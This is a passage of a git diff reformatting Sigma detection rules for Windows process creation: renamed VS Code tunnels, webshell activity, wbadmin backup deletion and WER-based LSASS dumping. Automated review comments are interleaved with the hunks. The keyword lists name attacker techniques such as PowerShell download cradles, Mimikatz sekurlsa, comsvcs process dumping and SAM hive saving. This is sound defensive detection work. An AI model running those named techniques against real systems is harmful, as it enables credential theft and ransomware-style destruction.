\terminal\browser\media\shellIntegration.ps1 selection_child_2: Image|endswith: - \wsl.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml index 6d296b74e..54edcc719 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml 
@@ -1,8 +1,7 @@ title: Renamed Visual Studio Code Tunnel Execution id: 2cf29f11-e356-4f61-98c0-1bdb9393d6da status: experimental -description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse - this functionality to establish a C2 channel +description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,15 +20,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_image_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_image_tunnel_service: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run @@ -37,7 +36,7 @@ detection: selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd @@ -49,8 +48,7 @@ detection: Image|endswith: - \code-tunnel.exe - \code.exe - condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) - or (1 of selection_parent_* and not 1 of filter_main_parent_*)) + condition: process_creation and ((1 of selection_image_* and not 1 of filter_main_image_*) or (1 of selection_parent_* and not 1 of filter_main_parent_*)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml index 1525fd4d5..64166a629 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'tunnel ' - service - internal-run diff --git a/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml b/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml index e47d889f5..c4fcf2a16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml @@ -1,8 +1,7 @@ title: Potential Binary Proxy Execution Via VSDiagnostics.EXE id: ac1c92b4-ac81-405a-9978-4604d78cc47e status: experimental -description: Detects execution of "VSDiagnostics.exe" with the "start" command in - order to launch and proxy arbitrary binaries. +description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. references: - https://twitter.com/0xBoku/status/1679200664013135872 author: Nasreddine Bencherchali (Nextron Systems) @@ -19,12 +18,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VSDiagnostics.exe - - OriginalFileName: VSDiagnostics.exe + - Image|endswith: \VSDiagnostics.exe + - OriginalFileName: VSDiagnostics.exe selection_cli_start: - CommandLine|contains: start + CommandLine|contains: start selection_cli_launch: - CommandLine|contains: + CommandLine|contains: - ' /launch:' - ' -launch:' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml b/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml index 192b431d0..3deebfde3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml @@ -1,8 +1,7 @@ title: Suspicious Vsls-Agent Command With AgentExtensionPath Load id: 43103702-5886-11ed-9b6a-0242ac120002 status: test -description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with - a suspicious library load using the --agentExtensionPath parameter +description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter references: - https://twitter.com/bohops/status/1583916360404729857 author: bohops @@ -20,9 +19,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \vsls-agent.exe - CommandLine|contains: --agentExtensionPath + CommandLine|contains: --agentExtensionPath filter: - CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. + CommandLine|contains: Microsoft.VisualStudio.LiveShare.Agent. condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml b/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml index 405119f79..dfa099683 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_w32tm.yml @@ -1,8 +1,7 @@ title: Use of W32tm as Timer id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 status: test -description: When configured with suitable command line arguments, w32tm can act as - a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains 
@@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_w32tm: - - Image|endswith: \w32tm.exe - - OriginalFileName: w32time.dll + - Image|endswith: \w32tm.exe + - OriginalFileName: w32time.dll selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - /stripchart - '/computer:' - '/period:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml index 601e0c395..4b95740f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml @@ -1,8 +1,7 @@ title: Wab Execution From Non Default Location id: 395907ee-96e5-4666-af2e-2ca91688e151 status: test -description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft - Address Book Import Tool) from non default locations as seen with bumblebee activity +description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime diff --git a/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml index c6a94e5aa..7d4202e37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml 
@@ -1,9 +1,7 @@ title: Wab/Wabmig Unusual Parent Or Child Processes id: 63d1ccc0-2a43-4f4b-9289-361b308991ff status: test -description: Detects unusual parent or children of the wab.exe (Windows Contacts) - and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used - with bumblebee activity +description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime @@ -24,16 +22,18 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe Image|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentImage|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml b/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml index 73816125c..c118c8371 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml 
@@ -1,13 +1,10 @@ title: SystemStateBackup Deleted Using Wbadmin.EXE id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8 status: test -description: 'Deletes the Windows systemstatebackup using wbadmin.exe. - +description: | + Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. - This may only be successful on server platforms that have Windows Backup enabled. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 @@ -25,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - Image|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'delete ' - 'systemstatebackup ' - -keepVersions:0 diff --git a/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml index 434d857f8..060957d67 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious WebDAV LNK Execution id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe related: - - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 - type: similar + - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 + type: similar status: experimental description: Detects possible execution via LNK file accessed on a WebDAV server. references: @@ -31,7 +31,7 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - CommandLine|contains: \DavWWWRoot\ + CommandLine|contains: \DavWWWRoot\ condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml index 581261e71..d514bd01a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_chopper.yml @@ -1,8 +1,7 @@ title: Chopper Webshell Process Pattern id: fa3c117a-bc0d-416e-a31b-0c0e80653efb status: test -description: Detects patterns found in process executions cause by China Chopper like - tiny (ASPX) webshells +description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ author: Florian Roth (Nextron Systems), MSTI (query) @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_origin: - - Image|endswith: \w3wp.exe - - ParentImage|endswith: \w3wp.exe + - Image|endswith: \w3wp.exe + - ParentImage|endswith: \w3wp.exe selection_cmdline: - CommandLine|contains: + CommandLine|contains: - '&ipconfig&echo' - '&quser&echo' - '&whoami&echo' diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml index 48d90c999..4ef678cf3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_hacking.yml 
@@ -1,11 +1,8 @@ title: Webshell Hacking Activity Patterns id: 4ebc877f-4612-45cb-b3a5-8e3834db36c9 status: test -description: 'Detects certain parent child patterns found in cases in which a web - shell is used to perform certain credential dumping or exfiltration activities - on a compromised system - - ' +description: | + Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system references: - https://youtu.be/7aemGhaE9ds?t=641 author: Florian Roth (Nextron Systems) @@ -22,6 +19,7 @@ logsource: category: process_creation product: windows detection: + # Webserver process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational 
@@ -44,52 +42,61 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME + # Suspicious child processes selection_child_1: - CommandLine|contains|all: + # Process dumping + CommandLine|contains|all: - rundll32 - comsvcs selection_child_2: - CommandLine|contains|all: + # Winrar exfil + CommandLine|contains|all: - ' -hp' - ' a ' - ' -m' selection_child_3: - CommandLine|contains|all: + # User add + CommandLine|contains|all: - net - ' user ' - ' /add' selection_child_4: - CommandLine|contains|all: + CommandLine|contains|all: - net - ' localgroup ' - ' administrators ' - /add selection_child_5: Image|endswith: + # Credential stealing - \ntdsutil.exe + # AD recon - \ldifde.exe - \adfind.exe + # Process dumping - \procdump.exe - \Nanodump.exe + # Destruction / ransom groups - \vssadmin.exe - \fsutil.exe selection_child_6: - CommandLine|contains: - - ' -decode ' - - ' -NoP ' - - ' -W Hidden ' - - ' /decode ' - - ' /ticket:' - - ' sekurlsa' - - .dmp full - - .downloadfile( - - .downloadstring( - - FromBase64String - - process call create - - 'reg save ' + # SUspicious patterns + CommandLine|contains: + - ' -decode ' # Used with certutil + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' /decode ' # Used with certutil + - ' /ticket:' # Rubeus + - ' sekurlsa' # Mimikatz + - .dmp full # Process dumping method apart from procdump + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command + - FromBase64String # PowerShell encoded payload + - process call create # WMIC process creation + - 'reg save ' # save registry SAM - syskey extraction - whoami /priv condition: process_creation and (1 of selection_webserver_* and 1 of selection_child_*) falsepositives: 
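Review bot: The new heading `# SUspicious patterns` above `selection_child_6`'s `CommandLine|contains` has a capitalisation typo; `# Suspicious patterns` would match the other headings this hunk adds (`# Process dumping`, `# Winrar exfil`, `# User add`). The trailing comment `# save registry SAM - syskey extraction` on the `'reg save '` entry reads as one phrase with a stray dash; `# reg save of the SAM/SYSTEM hives (offline credential extraction)` says what the analyst needs without the ambiguity. The per-entry comments are otherwise a real improvement for triage. The `selection_webserver_*` blocks that the condition references start outside this hunk.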
diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml index 7f7e44dd8..7f1b09a0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml @@ -1,8 +1,7 @@ title: Webshell Detection With Command Line Keywords id: bed2a484-9348-4143-8a8a-b801c979301c status: test -description: Detects certain command line parameters often used during reconnaissance - activity via web shells +description: Detects certain command line parameters often used during reconnaissance activity via web shells references: - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/ 
@@ -42,65 +41,65 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME selection_susp_net_utility: OriginalFileName: - net.exe - net1.exe - CommandLine|contains: + CommandLine|contains: - ' user ' - ' use ' - ' group ' selection_susp_ping_utility: OriginalFileName: ping.exe - CommandLine|contains: ' -n ' + CommandLine|contains: ' -n ' selection_susp_change_dir: - CommandLine|contains: - - '&cd&echo' - - 'cd /d ' + CommandLine|contains: + - '&cd&echo' # china chopper web shell + - 'cd /d ' # https://www.computerhope.com/cdhlp.htm selection_susp_wmic_utility: OriginalFileName: wmic.exe - CommandLine|contains: ' /node:' + CommandLine|contains: ' /node:' selection_susp_misc_discovery_binaries: - - Image|endswith: - - \dsquery.exe - - \find.exe - - \findstr.exe - - \ipconfig.exe - - \netstat.exe - - \nslookup.exe - - \pathping.exe - - \quser.exe - - \schtasks.exe - - \systeminfo.exe - - \tasklist.exe - - \tracert.exe - - \ver.exe - - \wevtutil.exe - - \whoami.exe - - OriginalFileName: - - dsquery.exe - - find.exe - - findstr.exe - - ipconfig.exe - - netstat.exe - - nslookup.exe - - pathping.exe - - quser.exe - - schtasks.exe - - sysinfo.exe - - tasklist.exe - - tracert.exe - - ver.exe - - VSSADMIN.EXE - - wevtutil.exe - - whoami.exe + - Image|endswith: + - \dsquery.exe + - \find.exe + - \findstr.exe + - \ipconfig.exe + - \netstat.exe + - \nslookup.exe + - \pathping.exe + - \quser.exe + - \schtasks.exe + - \systeminfo.exe + - \tasklist.exe + - \tracert.exe + - \ver.exe + - \wevtutil.exe + - \whoami.exe + - OriginalFileName: + - dsquery.exe + - find.exe + - findstr.exe + - ipconfig.exe + - netstat.exe + - nslookup.exe + - pathping.exe + - quser.exe + - schtasks.exe + - sysinfo.exe + - tasklist.exe + - tracert.exe + - ver.exe + - VSSADMIN.EXE + - wevtutil.exe + - whoami.exe selection_susp_misc_discovery_commands: - CommandLine|contains: + CommandLine|contains: - ' Test-NetConnection ' - - 
dir \ + - dir \ # remote dir: dir \\C$:\windows\temp\*.exe condition: process_creation and (1 of selection_webserver_* and 1 of selection_susp_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml index 970b102d3..79ca39408 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml @@ -1,14 +1,11 @@ title: Suspicious Process By Web Server Process id: 8202070f-edeb-4d31-a010-a26c72ac5600 status: test -description: 'Detects potentially suspicious processes being spawned by a web server - process which could be the result of a successfully placed web shell or exploitation - - ' +description: | + Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation references: - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim - Shelton, Nasreddine Bencherchali (Nextron Systems) +author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/11/11 tags: @@ -31,7 +28,7 @@ detection: - \php-cgi.exe - \php.exe - \tomcat.exe - - \UMWorkerProcess.exe + - \UMWorkerProcess.exe # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - \w3wp.exe - \ws_TomcatService.exe selection_webserver_characteristics_tomcat1: 
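Review bot: In `selection_susp_misc_discovery_binaries` the re-indented `OriginalFileName` alternative lists `VSSADMIN.EXE`, but the parallel `Image|endswith` alternative has no `\vssadmin.exe` entry, so the two branches no longer cover the same set of binaries. This asymmetry predates the reflow, but since the hunk rewrites both lists it is the place to settle it: either add `- \vssadmin.exe` to the Image list or drop `VSSADMIN.EXE` here and leave shadow-copy tampering to the rules dedicated to it. The `sysinfo.exe` / `\systeminfo.exe` pair appears intentional (the binary's embedded OriginalFilename differs from its on-disk name); a one-line comment `# OriginalFilename of systeminfo.exe` would spare the next reader a check. The `selection_webserver_*` definitions used by the condition start outside this hunk.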
@@ -82,15 +79,13 @@ detection: - \wusa.exe filter_main_fp_1: ParentImage|endswith: \java.exe - CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager - "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt + CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt filter_main_fp_2: ParentImage|endswith: \java.exe - CommandLine|contains|all: + CommandLine|contains|all: - sc query - ADManager Plus - condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children - and not 1 of filter_main_*) + condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*) falsepositives: - Particular web applications may spawn a shell process legitimately level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml index 4f3b2865e..9de77e2e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml @@ -1,11 +1,8 @@ title: Webshell Tool Reconnaissance Activity id: f64e5c19-879c-4bae-b471-6d84c8339677 status: test -description: 'Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) - that perform reconnaissance looking for the existence of popular scripting tools - (perl, python, wget) on the system via the help commands - - ' +description: | + Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands references: - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html author: Cian Heasley, Florian Roth (Nextron Systems) 
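Review bot: The reflowed `filter_main_fp_1` literal `CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt` carries a double quote in the middle of the `ADManager Plus` path; if the real command line quotes the whole path or none of it, this `endswith` never matches and the false-positive exclusion is dead code. Please verify the literal against a captured process-creation event before merging, because joining the two wrapped lines makes the stray `"` easy to overlook. If it turns out to be an artifact, correct the literal rather than loosening the match — this exclusion sits under `ParentImage|endswith: \java.exe` and should stay pinned to the exact ManageEngine invocation so it cannot suppress a webshell spawning `cmd.exe` from a Java web server. The `selection_anomaly_children` list that the hunk's first context line belongs to starts outside the hunk.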
@@ -41,11 +38,11 @@ detection: ParentImage|endswith: - \java.exe - \javaw.exe - CommandLine|contains: + CommandLine|contains: - CATALINA_HOME - catalina.jar selection_recon: - CommandLine|contains: + CommandLine|contains: - perl --help - perl -h - python --help diff --git a/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml b/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml index 784aa29ec..62f411bed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via WER id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 status: test -description: Detects potential credential dumping via Windows Error Reporting LSASS - Shtinkering technique which uses the Windows Error Reporting to dump lsass +description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf 
@@ -21,16 +20,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Werfault.exe - - OriginalFileName: WerFault.exe + - Image|endswith: \Werfault.exe + - OriginalFileName: WerFault.exe selection_cli: - ParentUser|contains: + ParentUser|contains: # covers many language settings - AUTHORI - AUTORI User|contains: - AUTHORI - AUTORI - CommandLine|contains|all: + CommandLine|contains|all: + # Doc: WerFault.exe -u -p -ip -s + # Example: C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244 + # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique + # Example: If the "-p" points the PID of "lsass.exe" and "-ip" points to a different process than "lsass.exe" then this is a sign of malicious activity - ' -u -p ' - ' -ip ' - ' -s ' @@ -38,7 +41,6 @@ detection: ParentImage: C:\Windows\System32\lsass.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Windows Error Reporting might produce similar behavior. In that case, check - the PID associated with the "-p" parameter in the CommandLine. + - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml index 2f9b0b0fd..f6ebaa882 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml 
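Review bot: The comment block added under `CommandLine|contains|all` in `selection_cli` describes a PID relation (`-p` naming lsass while `-ip` names a different process) that the rule cannot evaluate — the selection only checks that ` -u -p `, ` -ip ` and ` -s ` occur, and the second hunk's `ParentImage: C:\Windows\System32\lsass.exe` filter is what screens out genuine LSASS crash reports. State that explicitly so analysts do not assume the PID check is automated, e.g. `# The rule only matches the flag pattern; the -p/-ip PID relation must be confirmed manually (see falsepositives)`. The `Doc:` and `Example:` lines are useful and can stay as they are.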
@@ -1,12 +1,10 @@ title: Potential ReflectDebugger Content Execution Via WerFault.EXE id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd related: - - id: 0cf2e1c6-8d10-4273-8059-738778f981ad - type: derived + - id: 0cf2e1c6-8d10-4273-8059-738778f981ad + type: derived status: experimental -description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that - is used to run files stored in the ReflectDebugger key which could be used to - store the path to the malware in order to masquerade the execution flow +description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -25,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \WerFault.exe - - OriginalFileName: WerFault.exe + - Image|endswith: \WerFault.exe + - OriginalFileName: WerFault.exe selection_cli: - CommandLine|contains: ' -pr ' + CommandLine|contains: ' -pr ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml index 9245629b4..77b2c02c1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml 
@@ -1,11 +1,10 @@ title: Suspicious Child Process Of Wermgr.EXE id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e related: - - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 - type: similar + - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child - process +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml index 0ef7fba80..88cb3fa45 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml @@ -1,11 +1,10 @@ title: Suspicious Execution Location Of Wermgr.EXE id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 related: - - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e - type: similar + - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution - location. +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml b/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml index 3f93f1f89..03893c0cb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml 
